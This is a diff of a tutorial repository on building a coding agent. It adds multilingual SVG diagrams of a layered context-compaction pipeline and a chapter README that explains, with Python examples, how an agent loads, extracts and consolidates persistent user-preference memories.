000000000..fd6164667 --- /dev/null +++ b/s08_context_compact/images/compact-overview.en.svg @@ -0,0 +1,129 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Context Compact — Compression Before LLM Call, Three Trigger Modes + + + s07 Preserved + s08 New + + + + messages[] + (s07 preserved) + + + + + + + Compression Pipeline + + + + ① Every Turn · Unconditional · 0 API + + + L1 snip_compact + + + L2 micro_compact + + + L3 tool_result_budget + + + + + + + Over threshold? + + + No → Pass + Straight to LLM + + + Yes↓ + + + + ② Conditional · Token Over Threshold · 1 API + + + L4 compact_history + + + + + + + LLM + stop_reason? 
+ + + + No + + Return Result + + + + Yes + + + + TOOL_HANDLERS + bash · read · write + task · load_skill · ... + + + + ③ Emergency Trigger + API returns prompt_too_long + → reactive_compact → retry + + + + Tool results appended to messages[] → next turn → compress again → LLM + + + + + + s07 Preserved: loop, hooks, skill loading, sub-agents + + + ① Every Turn Auto: L1→L2→L3 run unconditionally before each LLM call, 0 API + + + ② Conditional: after L1-L3, tokens still over threshold → compact_history, 1 API + + + ③ Emergency: API returns prompt_too_long → reactive_compact → retry + + Three modes with increasing cost: 0 API → 1 API → 1 API + more aggressive trimming + diff --git a/s08_context_compact/images/compact-overview.ja.svg b/s08_context_compact/images/compact-overview.ja.svg new file mode 100644 index 000000000..5e86a7440 --- /dev/null +++ b/s08_context_compact/images/compact-overview.ja.svg @@ -0,0 +1,129 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Context Compact — LLM 呼び出し前に圧縮、3 つのトリガーモード + + + s07 保持 + s08 新規 + + + + messages[] + (s07 保持) + + + + + + + 圧縮パイプライン + + + + ① 毎ターン自動 · 無条件 · 0 API + + + L1 snip_compact + + + L2 micro_compact + + + L3 tool_result_budget + + + + + + + 閾値超過? + + + No → 通過 + 直接 LLM へ + + + Yes↓ + + + + ② 条件 · トークン閾値超過 · 1 API + + + L4 compact_history + + + + + + + LLM + stop_reason? + + + + No + + 結果を返す + + + + Yes + + + + TOOL_HANDLERS + bash · read · write + task · load_skill · ... 
+ + + + ③ 緊急トリガー + API が prompt_too_long を返す + → reactive_compact → リトライ + + + + ツール結果を messages[] に追加 → 次ターン → 再圧縮 → LLM + + + + + + s07 保持:ループ、フック、スキルロード、サブエージェント + + + ① 毎ターン自動:L1→L2→L3 が各 LLM 呼び出し前に無条件実行、0 API + + + ② 条件トリガー:L1-L3 後もトークン超過 → compact_history、1 API + + + ③ 緊急トリガー:API が prompt_too_long を返す → reactive_compact → リトライ + + 3 つのモードはコスト増加:0 API → 1 API → 1 API + より積極的なトリム + diff --git a/s08_context_compact/images/compact-overview.svg b/s08_context_compact/images/compact-overview.svg new file mode 100644 index 000000000..aa48d6087 --- /dev/null +++ b/s08_context_compact/images/compact-overview.svg @@ -0,0 +1,129 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Context Compact — 压缩插在 LLM 调用前,三种触发模式 + + + s07 保留 + s08 新增 + + + + messages[] + (s07 保留) + + + + + + + 压缩管线 + + + + ① 每轮自动 · 无条件 · 0 API + + + L1 snip_compact + + + L2 micro_compact + + + L3 tool_result_budget + + + + + + + 超阈值? + + + 否 → 通过 + 直接进 LLM + + + 是↓ + + + + ② 条件触发 · token 超阈值 · 1 API + + + L4 compact_history + + + + + + + LLM + stop_reason? + + + + + + 返回结果 + + + + + + + + TOOL_HANDLERS + bash · read · write + task · load_skill · ... 
+ + + + ③ 异常触发 + API 返回 prompt_too_long + → reactive_compact → 重试 + + + + 工具结果追加到 messages[] → 下一轮 → 再次压缩 → LLM + + + + + + s07 保留:循环、钩子、技能加载、子 Agent + + + ① 每轮自动:L1→L2→L3 在每次 LLM 调用前无条件执行,0 API + + + ② 条件触发:L1-L3 跑完 token 仍超阈值 → compact_history,1 API + + + ③ 异常触发:API 返回 prompt_too_long → reactive_compact → 重试 + + 三种模式的代价递增:0 API → 1 API → 1 API + 更激进的裁剪 + diff --git a/s08_context_compact/images/compaction-layers.en.svg b/s08_context_compact/images/compaction-layers.en.svg new file mode 100644 index 000000000..a6ca7e1a7 --- /dev/null +++ b/s08_context_compact/images/compaction-layers.en.svg @@ -0,0 +1,99 @@ + + + + + + + + + + + + + + + + + + + + + + + + + Context Compaction — Pre-processing Pipeline + Auto-compact + Emergency Fallback + + + + Design Principles + Cheap operations first, expensive later + Trim text before dropping messages + Drop messages before calling LLM + + + + Increasing Cost + Text ops → LLM summary → Emergency trim + 0 API · 0 API · 0 API · 1 API · 1 API + + + + Pre-processing Pipeline (runs before every LLM call, 0 API calls) + + + + L1 + snipCompact + messages > 50 → keep first 3 + last 47, trim middle + Drop messages + Trigger: message count exceeds threshold + + + + + + + L2 + microCompact + Old tool_result → clear API cache_edits (keep latest 3) + Clear old results + Trigger: every turn automatically; tutorial uses text placeholder + + + + + + + L3 + toolResultBudget + Single user message tool_result total > 200KB → spill largest to disk + Spill large results + Trigger: auto-check after every tool execution + + + + Auto-compact Decision (triggered when pre-processing is insufficient, 1 API call) + + + + L4 + autoCompact + tokens over threshold → LLM full summary + 1 API call + Threshold: contextWindow - maxOutputTokens - 13,000 · Try sessionMemoryCompact first, then LLM + Circuit breaker: stop retrying after 3 consecutive failures + + + + Emergency Fallback (triggered when API still returns prompt_too_long) + + + + Emrg + reactiveCompact 
+ API returns 413 → byte-level trim, keep last 5 + summary + More aggressive than autoCompact + Trigger: API returns prompt_too_long or 413 error + + diff --git a/s08_context_compact/images/compaction-layers.ja.svg b/s08_context_compact/images/compaction-layers.ja.svg new file mode 100644 index 000000000..82d4aa424 --- /dev/null +++ b/s08_context_compact/images/compaction-layers.ja.svg @@ -0,0 +1,99 @@ + + + + + + + + + + + + + + + + + + + + + + + + + コンテキスト圧縮 — 前処理パイプライン + 自動圧縮 + 緊急フォールバック + + + + 設計原則 + 安価な処理を先に、高価な処理を後に + テキスト修正 → メッセージ削除の順 + メッセージ削除 → LLM 呼び出しの順 + + + + コスト増加 + テキスト操作 → LLM 要約 → 緊急トリム + 0 API · 0 API · 0 API · 1 API · 1 API + + + + 前処理パイプライン(各 LLM 呼び出し前に自動実行、0 API 呼び出し) + + + + L1 + snipCompact + メッセージ > 50 → 先頭 3 + 末尾 47 を保持、中間をトリム + メッセージ削除 + トリガー:メッセージ数が閾値を超過 + + + + + + + L2 + microCompact + 古い tool_result → API cache_edits をクリア(最新 3 件を保持) + 古い結果をクリア + トリガー:毎ターン自動実行、チュートリアル版はテキストプレースホルダーで模擬 + + + + + + + L3 + toolResultBudget + 単一 user メッセージの tool_result 合計 > 200KB → 最大のものをディスクに退避 + 大結果を退避 + トリガー:毎ターンのツール実行後に自動チェック + + + + 自動圧縮判定(前処理で不足時にトリガー、1 API 呼び出し) + + + + L4 + autoCompact + トークンが閾値超過 → LLM 全量要約 + 1 API 呼び出し + 閾値: contextWindow - maxOutputTokens - 13,000 · sessionMemoryCompact を先に試行、不足時のみ LLM 呼び出し + サーキットブレーカー:連続 3 回失敗後にリトライ停止 + + + + 緊急フォールバック(API が引き続き prompt_too_long を返す場合にトリガー) + + + + 緊急 + reactiveCompact + API が 413 を返す → バイトレベルでトリム、最後の 5 件 + 要約を保持 + autoCompact より積極的 + トリガー:API が prompt_too_long または 413 エラーを返す + + diff --git a/s08_context_compact/images/compaction-layers.svg b/s08_context_compact/images/compaction-layers.svg new file mode 100644 index 000000000..ad46b5f10 --- /dev/null +++ b/s08_context_compact/images/compaction-layers.svg @@ -0,0 +1,99 @@ + + + + + + + + + + + + + + + + + + + + + + + + + 上下文压缩 — 预处理管线 + 自动压缩 + 应急兜底 + + + + 设计原则 + 便宜的先跑,贵的后跑 + 能改文本 → 不删整条 + 能删整条 → 不调 LLM + + + + 代价递增 + 文本操作 → LLM 摘要 → 应急裁剪 + 0 API · 0 API · 0 API · 1 API · 1 API + + + + 预处理管线(每轮 LLM 调用前自动执行,0 API 调用) + + + + L1 + snipCompact + 
消息 > 50 条 → 保留头 3 + 尾 47,裁中间 + 删除消息 + 触发:消息数超过阈值 + + + + + + + L2 + microCompact + 旧 tool_result → API cache_edits 清除(保留最近 3 条) + 清除旧结果 + 触发:每轮自动,教学版用文本占位符模拟 + + + + + + + L3 + toolResultBudget + 单 user 消息 tool_result 总和 > 200KB → 落盘最大的 + 大结果落盘 + 触发:每轮工具执行后自动检查 + + + + 自动压缩决策(预处理不够时触发,1 API 调用) + + + + L4 + autoCompact + token 超阈值 → LLM 全量摘要 + 1 API 调用 + 阈值: contextWindow - maxOutputTokens - 13,000 · 先尝试 sessionMemoryCompact,不够才调 LLM + 熔断:连续失败 3 次后停止重试 + + + + 应急兜底(API 仍然返回 prompt_too_long 时触发) + + + + 应急 + reactiveCompact + API 返回 413 → 字节级裁剪,保留最后 5 条 + 摘要 + 比 autoCompact 更激进 + 触发:API 返回 prompt_too_long 或 413 错误 + + diff --git a/s08_context_compact/images/layer1-budget.en.svg b/s08_context_compact/images/layer1-budget.en.svg new file mode 100644 index 000000000..1870c59b4 --- /dev/null +++ b/s08_context_compact/images/layer1-budget.en.svg @@ -0,0 +1,50 @@ + + + + + + + + + + + + + + L3: toolResultBudget — Large Result Persistence + + + + Pain Point + Model read 30 files in one turn; total tool_result adds up to 500KB, filling the entire context window + + + Before + + tool_result: (78KB) ... + tool_result: (142KB) ... + tool_result: (290KB) ... + Total 510KB → over budget + + + + + + After + + tool_result: <persisted-output> + Full output: .task_outputs/t1.txt + Preview: (first 2000 chars) ... + Total 18KB → normal + + + + How + 1. Sum the size of all tool_result in the latest turn + 2. Over 200KB → sort by size, persist the largest to .task_outputs/tool-results/ + 3. 
Keep only <persisted-output> marker + first 2000 chars preview in context + + + + Result: No data lost (full data on disk), context drops from 510KB to ~18KB, 0 API calls + diff --git a/s08_context_compact/images/layer1-budget.ja.svg b/s08_context_compact/images/layer1-budget.ja.svg new file mode 100644 index 000000000..b76862cbc --- /dev/null +++ b/s08_context_compact/images/layer1-budget.ja.svg @@ -0,0 +1,50 @@ + + + + + + + + + + + + + + L3: toolResultBudget — 大結果の永続化 + + + + ペインポイント + モデルが一度に 30 ファイルを読み込み、単一ターンの tool_result が合計 500KB に達し、コンテキストウィンドウを圧迫 + + + 圧縮前 + + tool_result: (78KB) ... + tool_result: (142KB) ... + tool_result: (290KB) ... + 合計 510KB → 予算超過 + + + + + + 圧縮後 + + tool_result: <persisted-output> + Full output: .task_outputs/t1.txt + Preview: (先頭 2000 文字) ... + 合計 18KB → 正常 + + + + 方法 + 1. 最終ターンの全 tool_result の合計サイズを集計 + 2. 200KB 超過 → サイズ順にソートし、最大のものから .task_outputs/tool-results/ に永続化 + 3. コンテキストには <persisted-output> マーカー + 先頭 2000 文字のプレビューのみ残す + + + + 結果:情報は失われていない(ディスクに完全なデータあり)、コンテキストは 510KB → ~18KB に削減、0 回 API 呼び出し + diff --git a/s08_context_compact/images/layer1-budget.svg b/s08_context_compact/images/layer1-budget.svg new file mode 100644 index 000000000..53f2d5c77 --- /dev/null +++ b/s08_context_compact/images/layer1-budget.svg @@ -0,0 +1,50 @@ + + + + + + + + + + + + + + L3: toolResultBudget — 大结果落盘 + + + + 痛点 + 模型一次读了 30 个文件,单轮 tool_result 加起来 500KB,直接把上下文窗口打满 + + + 压缩前 + + tool_result: (78KB) ... + tool_result: (142KB) ... + tool_result: (290KB) ... + 合计 510KB → 超预算 + + + + + + 压缩后 + + tool_result: <persisted-output> + Full output: .task_outputs/t1.txt + Preview: (前 2000 字符) ... + 合计 18KB → 正常 + + + + 怎么做 + 1. 统计最后一轮所有 tool_result 的总大小 + 2. 超过 200KB → 按大小排序,从最大的开始落盘到 .task_outputs/tool-results/ + 3. 
上下文里只留 <persisted-output> 标记 + 前 2000 字符预览 + + + + 结果:信息没丢(磁盘有完整数据),上下文从 510KB 降到 ~18KB,0 次 API 调用 + diff --git a/s08_context_compact/images/micro-compact.en.svg b/s08_context_compact/images/micro-compact.en.svg new file mode 100644 index 000000000..51ed00825 --- /dev/null +++ b/s08_context_compact/images/micro-compact.en.svg @@ -0,0 +1,57 @@ + + + + + + + + + + + + + + L2: microCompact — Old Result Placeholder Replacement + + + + Pain Point + Agent read 10 files in a row; the full content of reads 1-7 is still sitting in context, taking space but no longer useful + + + Before (all 10 tool_result complete) + + + Read file A: (full content, 3200 chars)... + + Read file B: (full content, 1800 chars)... + + Read file C: (full content, 4500 chars)... + + Read file J: (full content, 2800 chars) + 7 old results waste ~25K chars + + + + + + After (keep only latest 3 complete) + + + [Earlier result compacted. Re-run if needed.] + + [Earlier result compacted. Re-run if needed.] + + [Earlier result compacted. Re-run if needed.] + + Read file J: (full content, 2800 chars) + Keep only latest 3; first 7 become placeholders + + + + How (teaching version) + Iterate through tool_result, keep only latest 3 complete, replace older ones with placeholders. + Real CC + Clears old results via API cache_edits (without breaking prompt cache prefix), only for COMPACTABLE_TOOLS: + Read, Bash, Grep, Glob, WebSearch, WebFetch, Edit, Write. Teaching version uses text placeholders to simulate the same effect. + diff --git a/s08_context_compact/images/micro-compact.ja.svg b/s08_context_compact/images/micro-compact.ja.svg new file mode 100644 index 000000000..5d8bff755 --- /dev/null +++ b/s08_context_compact/images/micro-compact.ja.svg @@ -0,0 +1,57 @@ + + + + + + + + + + + + + + L2: microCompact — 旧結果のプレースホルダー置換 + + + + ペインポイント + Agent が連続で 10 ファイルを読み込み、1〜7 回目の完全なファイル内容がコンテキストに残ったまま、場所を占有しつつ既に不要 + + + 圧縮前(10 件の tool_result がすべて完全) + + + Read file A: (完全な内容, 3200 文字)... 
+ + Read file B: (完全な内容, 1800 文字)... + + Read file C: (完全な内容, 4500 文字)... + + Read file J: (完全な内容, 2800 文字) + 7 件の旧結果が ~25K 文字を無駄に占有 + + + + + + 圧縮後(最新 3 件のみ完全保持) + + + [Earlier result compacted. Re-run if needed.] + + [Earlier result compacted. Re-run if needed.] + + [Earlier result compacted. Re-run if needed.] + + Read file J: (完全な内容, 2800 文字) + 最新 3 件のみ保持、前 7 件はプレースホルダー化 + + + + 方法(教学版) + tool_result を走査し、最新 3 件のみ完全保持、古いものはプレースホルダーに置換。 + 実際の CC + API cache_edits で旧結果をクリア(prompt cache プレフィックスを破壊しない)、COMPACTABLE_TOOLS のみ対象: + Read, Bash, Grep, Glob, WebSearch, WebFetch, Edit, Write。教学版はテキストプレースホルダーで同様の効果を模擬。 + diff --git a/s08_context_compact/images/micro-compact.svg b/s08_context_compact/images/micro-compact.svg new file mode 100644 index 000000000..e1728f7d6 --- /dev/null +++ b/s08_context_compact/images/micro-compact.svg @@ -0,0 +1,57 @@ + + + + + + + + + + + + + + L2: microCompact — 旧结果占位替换 + + + + 痛点 + Agent 连续读了 10 个文件,第 1-7 次的完整文件内容还躺在上下文里,占着位置但早就没用了 + + + 压缩前(10 条 tool_result 全部完整) + + + Read file A: (完整内容, 3200 字符)... + + Read file B: (完整内容, 1800 字符)... + + Read file C: (完整内容, 4500 字符)... + + Read file J: (完整内容, 2800 字符) + 7 条旧结果白占 ~25K 字符 + + + + + + 压缩后(只保留最近 3 条完整) + + + [Earlier result compacted. Re-run if needed.] + + [Earlier result compacted. Re-run if needed.] + + [Earlier result compacted. Re-run if needed.] + + Read file J: (完整内容, 2800 字符) + 只保留最近 3 条,前 7 条变占位 + + + + 怎么做(教学版) + 遍历 tool_result,只保留最近 3 条完整,更旧的替换为占位符。 + 真实 CC + 通过 API cache_edits 清除旧结果(不破坏 prompt cache 前缀),仅对 COMPACTABLE_TOOLS 生效: + Read, Bash, Grep, Glob, WebSearch, WebFetch, Edit, Write。教学版用文本占位模拟同样效果。 + diff --git a/s09_memory/README.en.md b/s09_memory/README.en.md new file mode 100644 index 000000000..39cde9321 --- /dev/null +++ b/s09_memory/README.en.md @@ -0,0 +1,260 @@ +# s09: Memory — Remember What Matters, Forget What Doesn't + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s07 → s08 → `s09` → [s10](../s10_system_prompt/) → s11 → ... 
→ s19 +> *"Remember what matters, forget what doesn't"* — Three subsystems: filter, extract, consolidate. +> +> **Harness Layer**: Memory — knowledge accumulation across compaction and sessions. + +--- + +## The Problem + +s08 gave the Agent the ability to compact context and run for a long time without crashing. But compaction is lossy. + +autoCompact preserves the current goal, remaining work, and constraints you mentioned in the summary — it's not total amnesia. But a summary is not a recording: your offhand remark "use tabs not spaces" might get simplified to "user has code style preferences," losing the specifics. **And when you start a new session, even the summary is gone.** + +Multiple compactions also cause cumulative drift — summaries of summaries, with details degrading like a JPEG recompressed over and over. + +**What's needed is a layer of stable memory that doesn't participate in summaries and persists across sessions — that's memory.** + +--- + +## The Solution + +![Memory Overview](images/memory-overview.en.svg) + +s08's compaction pipeline is fully preserved. The only change: inject relevant memories before each LLM call, extract new memories from the conversation after autoCompact, and periodically consolidate to deduplicate. + +Three subsystems, ordered by trigger timing: + +| Subsystem | Trigger Timing | What It Does | +|-----------|---------------|--------------| +| Loading | Before each LLM call | Filter relevant memories, inject into context | +| Extraction | After autoCompact | Auto-discover preferences, constraints, decisions from dialogue | +| Consolidation | Periodic / idle | Deduplicate, merge, prune outdated memories | + +Memory files are persisted on disk (`.memory/`), surviving across compactions and sessions. 
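The chapter's code calls `read_all_memory_files` (it also appears in the Changes table below) but never defines it. A minimal sketch consistent with the `.memory/mem_*.json` layout described above might look like this; the `memory_dir` parameter and the skip-on-corruption behavior are assumptions, not CC's implementation:

```python
import json
from pathlib import Path

def read_all_memory_files(memory_dir: Path = Path(".memory")) -> list[dict]:
    """Load every persisted memory: one JSON file per memory, sorted for stable order."""
    if not memory_dir.exists():
        return []
    memories = []
    for path in sorted(memory_dir.glob("mem_*.json")):
        try:
            memories.append(json.loads(path.read_text()))
        except json.JSONDecodeError:
            continue  # a single corrupted file should not break memory loading
    return memories
```

Skipping unreadable files (rather than raising) matters here because Extraction writes files incrementally: one bad write should not take the whole memory subsystem down.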
+ +--- + +## How It Works + +![Memory Subsystems](images/memory-subsystems.en.svg) + +### Loading: Auto-load Relevant Memories + +Before each LLM call, the Agent needs to know what the user has said before — "use tabs not spaces," "prefer single quotes." But stuffing all memories into the context brings back the old system prompt bloat problem. + +Only filter memories **relevant** to the current conversation, capped at 5: + +```python +def load_memories(messages: list, max_items: int = 5) -> str: + """筛选与当前对话相关的记忆。""" + memories = read_all_memory_files() + if not memories: + return "" + + recent = extract_recent_user_messages(messages, n=3) + keywords = extract_keywords(recent) + + relevant = [] + for mem in memories: + if any(keyword in mem["content"].lower() + for keyword in keywords): + relevant.append(mem) + if len(relevant) >= max_items: + break + + return format_memories_for_context(relevant) +``` + +Keyword matching isn't precise enough — "indentation" might match "code indentation is 4 spaces" (the opposite of the user's preference). You need to truly "understand" the conversation content to discover new memories. → Extraction. + +### Extraction: Auto-discover New Memories + +Users don't say "remember this" every time. Preferences come out naturally — "I think tabs are better than spaces," "let's use single quotes from now on." The Agent needs to judge for itself: is there information worth remembering in this message? + +At the right moment (after autoCompact, since we're calling the LLM anyway), let the Agent analyze the recent conversation and extract preferences, constraints, decisions: + +```python +def extract_memories(messages: list): + """从最近对话中提取值得记住的信息,直接写文件。""" + recent = get_recent_conversation(messages, n=10) + + prompt = ( + "Extract user preferences, constraints, or decisions from this dialogue.\n" + "Return a JSON array. 
Each item: {content, type: preference|constraint|decision}.\n" + "If nothing new, return [].\n\n" + f"{recent}" + ) + + response = client.messages.create( + model=MODEL, + messages=[{"role": "user", "content": prompt}], + max_tokens=500, + ) + for mem in parse_memory_json(response.content[0].text): + mid = f"mem_{int(time.time())}_{abs(hash(mem['content'])) % 10000}" + (MEMORY_DIR / f"{mid}.json").write_text(json.dumps(mem, indent=2)) +``` + +10 memories, 50, 200 — duplicates, contradictions, outdated ones. Need periodic consolidation. → Consolidation. + +### Consolidation: Periodic Cleanup + +Extraction appends a new file every time it discovers a memory. After two months, `.memory/` has 200 files — "use tabs" and "use spaces" coexist as contradictory memories, and the Agent doesn't know which to follow. + +Trigger Consolidation periodically — let the LLM deduplicate, merge, and prune outdated memories. CC calls this process **Dream** (an analogy to the brain organizing memories during sleep), running in the background when the Agent is idle: + +```python +CONSOLIDATE_THRESHOLD = 10 + +def consolidate_memories(): + """合并重复记忆,淘汰过时记忆。""" + memories = read_all_memory_files() + + if len(memories) < CONSOLIDATE_THRESHOLD: + return # 太少,不值得整理 + + prompt = ( + "Consolidate the following memories. Rules:\n" + "1. Merge duplicates into one concise memory\n" + "2. Remove outdated/contradicted memories\n" + "3. Keep the total under 50 memories\n" + "4. 
Preserve important user preferences above all\n\n" + f"{json.dumps(memories, indent=2)}" + ) + + response = client.messages.create( + model=MODEL, + messages=[{"role": "user", "content": prompt}], + max_tokens=2000, + ) + consolidated = json.loads(response.content[0].text.strip()) + # 清空旧记忆,写入合并后的 + for f in MEMORY_DIR.glob("mem_*.json"): + f.unlink() + for mem in consolidated: + mid = f"mem_{int(time.time())}_{abs(hash(mem.get('content', ''))) % 10000}" + (MEMORY_DIR / f"{mid}.json").write_text(json.dumps(mem, indent=2)) +``` + +--- + +## Changes From s08 + +| Component | Before (s08) | After (s09) | +|-----------|-------------|------------| +| Memory capability | None (preferences degrade with compaction summaries) | Loading + Extraction + Consolidation subsystems | +| New functions | — | load_memories, extract_memories, consolidate_memories, read_all_memory_files | +| Storage | — | .memory/mem_*.json cross-session persistence | +| Tools | bash, read_file, write_file, task, list_skills, load_skill, compact (7) | bash, read_file, write_file (3) — focused on memory demo | +| Loop | Only compaction each round | Inject relevant memories each round + extract new memories after autoCompact + periodic consolidation | + +--- + +## Try It + +```sh +cd learn-claude-code +python s09_memory/code.py +``` + +Try these prompts (enter across multiple rounds, observe memory accumulation and loading): + +1. `I prefer using tabs for indentation, not spaces. Remember that.` +2. `Create a Python file called test.py` (observe whether the Agent uses tabs) +3. `What did I tell you about my preferences?` (observe whether the Agent remembers) +4. `I also prefer single quotes over double quotes for strings.` + +What to watch for: After multiple rounds, do memory files appear in the `.memory/` directory? When starting a new conversation, does the Agent auto-load previous memories? + +--- + +## What's Next + +Now we have memory, tools, and compaction. 
But the system prompt is still a hardcoded monolithic string — "You are a coding agent, your tools are bash, read, write...". + +Add a new tool to the Agent, and you have to manually add a description to the system prompt. Switch projects, and the entire system prompt needs rewriting. The prompt should be **assembled at runtime**, like Lego — different scenarios, different bricks. + +s10 System Prompt → segmented + runtime assembly. Different projects, different users, different tools — assemble different prompts. + +
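Before diving into the source, one loose end from the Loading section: `load_memories` calls `extract_recent_user_messages` and `extract_keywords`, which the chapter leaves unshown. A hypothetical minimal version (the stopword list and 3-character cutoff are illustrative choices, not CC's):

```python
import re

STOPWORDS = {"the", "a", "an", "to", "of", "in", "for", "and", "is", "it",
             "i", "you", "my", "me", "that", "this", "with", "on", "do"}

def extract_recent_user_messages(messages: list, n: int = 3) -> str:
    """Concatenate the text of the last n plain-text user messages."""
    texts = [m["content"] for m in messages
             if m.get("role") == "user" and isinstance(m.get("content"), str)]
    return " ".join(texts[-n:])

def extract_keywords(text: str, min_len: int = 3) -> set[str]:
    """Lowercased word tokens, minus stopwords and very short words."""
    words = re.findall(r"[a-z_]{%d,}" % min_len, text.lower())
    return {w for w in words if w not in STOPWORDS}
```

This is exactly the imprecision the chapter warns about: bag-of-words matching has no notion of negation or context, which is why Extraction hands the judgment to the LLM.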
+Dive into CC Source Code + +> The following is based on a complete analysis of CC source code `extractMemories.ts` (615 lines), `sessionMemory.ts` (495 lines), `memoryTypes.ts`, `findRelevantMemories.ts`, and `autoDream/`. + +### 1. MemorySelector: Uses LLM Selection, Not Embedding + +The teaching version says "CC uses embedding vector similarity" — **this is wrong**. CC actually uses **Sonnet itself to select** (`findRelevantMemories.ts`): + +1. Lists all memory files' `name` + `description` (extracted from YAML frontmatter) as a catalog +2. Sends the catalog to Sonnet: "Based on name and description, select truly useful memories (max 5). If unsure, don't select." +3. Sonnet returns `{ selected_memories: ["file1.md", ...] }` +4. Full content of selected files is read (max 200 lines / 4096 bytes per file) and injected into context + +This means memory selection is itself an LLM call — but it's a lightweight Sonnet side-query that doesn't block the main flow. + +### 2. ExtractMemories: Triggered in Stop Hook, Runs Every Turn + +Trigger timing (`stopHooks.ts:141-152`): +- Inside `handleStopHooks()` — when the model stops with no tool_use +- **Not** after autoCompact (the teaching version simplifies this) +- Runs every N turns (default N=1, i.e., every turn) +- Has overlap protection: if the main Agent already wrote a memory file, skip + +### 3. Memory File Format: Markdown + YAML Frontmatter, Not JSON + +The teaching version uses JSON for storage. CC actually uses **Markdown files + YAML frontmatter** (`memoryTypes.ts:261-271`): + +```markdown +--- +name: user_preference_tabs +description: User prefers tabs for indentation +type: user +--- + +User prefers using tabs, not spaces, for indentation in all projects. +**Why:** Consistency with existing codebase conventions. +**How to apply:** Always use tabs when writing or editing Python files. 
+``` + +Four types: `user` (user preferences), `feedback` (feedback guidance), `project` (project facts), `reference` (external references). + +The memory index file `MEMORY.md` is one link per line: `- [Title](file.md) — one-line hook`. Max 200 lines / 25KB. + +Storage location: `~/.claude/projects//memory/` + +### 4. DreamConsolidator: Three-Layer Gate Control + +Not "triggered when idle," but three-layer gating (`autoDream.ts`): + +1. **Time gate** (cheapest): ≥ 24 hours since last consolidation +2. **Session gate**: ≥ 5 session transcripts modified since last consolidation +3. **Lock gate**: no other process currently doing consolidation (`.consolidate-lock` file) + +The merge algorithm itself is **yet another forked agent call** — four-phase prompt: locate → collect recent signals → merge and write files → prune and update index. Lock file mtime is the lastConsolidatedAt. Crash recovery: lock auto-expires after 1 hour, next process reclaims. + +### 5. Session Memory vs User Memory + +| | User Memory | Session Memory | +|---|---|---| +| Persistence | Cross-session | Single session | +| Storage | Multiple .md files under `memory/` | Single file `session-memory//memory.md` | +| Loaded into | system prompt | compact summary | +| Purpose | Cross-session knowledge accumulation | Cross-compact context continuity | + +sessionMemoryCompact (the mechanism mentioned in s08) is exactly what uses Session Memory — before autoCompact, read the session memory file first; if there's enough content (≥ 10K tokens, ≥ 5 text messages, ≤ 40K tokens), use it for summarization without calling the LLM. 
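The frontmatter format from section 3 is simple enough to parse with the standard library alone. A minimal sketch (helper names are illustrative, not CC's actual API) that also builds the name + description catalog the selector from section 1 works on:

```python
import re

def parse_memory_file(text: str) -> dict:
    """Split a memory file into frontmatter fields plus body.

    Minimal parser for the `--- ... ---` block shown above; a real
    implementation would use a proper YAML library.
    """
    m = re.match(r"^---\n(.*?)\n---\n(.*)$", text, re.DOTALL)
    if not m:
        return {"body": text}  # no frontmatter: treat the whole file as body
    fields = {}
    for line in m.group(1).splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    fields["body"] = m.group(2).strip()
    return fields

def build_catalog(files: dict[str, str]) -> str:
    """One `name — description` line per file: the listing sent to the selector."""
    lines = []
    for fname, text in sorted(files.items()):
        meta = parse_memory_file(text)
        lines.append(f"- {fname}: {meta.get('name', fname)} — {meta.get('description', '')}")
    return "\n".join(lines)
```

The selector prompt then carries only this catalog, not the file bodies — full contents are read only for the few files the model picks.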
+
+### The Teaching Version's Simplifications Are Intentional
+
+- LLM selection → keyword matching: the teaching version can't rely on an extra Sonnet side-query
+- Markdown + YAML frontmatter → JSON: the teaching version stores memories as JSON for simplicity
+- Stop hook trigger → after-autoCompact trigger: conceptually more coherent ("extract memories while compressing")
+- Three-layer gating → simple count threshold: the teaching version has no transcript system or multi-session concept
+
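The three gates from section 4 reduce to a few filesystem checks. A sketch under the assumptions stated there — the directory layout, helper name, and constants below are illustrative, not CC's actual code:

```python
import time
from pathlib import Path

CONSOLIDATE_INTERVAL = 24 * 3600   # time gate: >= 24 h since last consolidation
MIN_MODIFIED_SESSIONS = 5          # session gate: >= 5 transcripts touched since then
LOCK_TTL = 3600                    # crash recovery: locks older than 1 h are stale

def try_acquire_consolidation(memory_dir: Path, transcript_dir: Path) -> bool:
    """Run the three gates in cost order; True means this process may consolidate now."""
    lock = memory_dir / ".consolidate-lock"
    now = time.time()
    last = lock.stat().st_mtime if lock.exists() else 0.0  # mtime = lastConsolidatedAt

    # 1. time gate (cheapest): skip if we consolidated less than 24 h ago
    if last and now - last < CONSOLIDATE_INTERVAL:
        return False
    # 2. session gate: need enough new transcript activity since the last run
    changed = [p for p in transcript_dir.glob("*") if p.stat().st_mtime > last]
    if len(changed) < MIN_MODIFIED_SESSIONS:
        return False
    # 3. lock gate: a lock younger than LOCK_TTL means another process is mid-run
    if lock.exists() and now - lock.stat().st_mtime < LOCK_TTL:
        return False
    lock.touch()  # claim the lock; its mtime now records this consolidation
    return True
```

Because the lock file's mtime doubles as lastConsolidatedAt, a crashed run simply leaves behind a lock that the TTL lets the next process reclaim.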
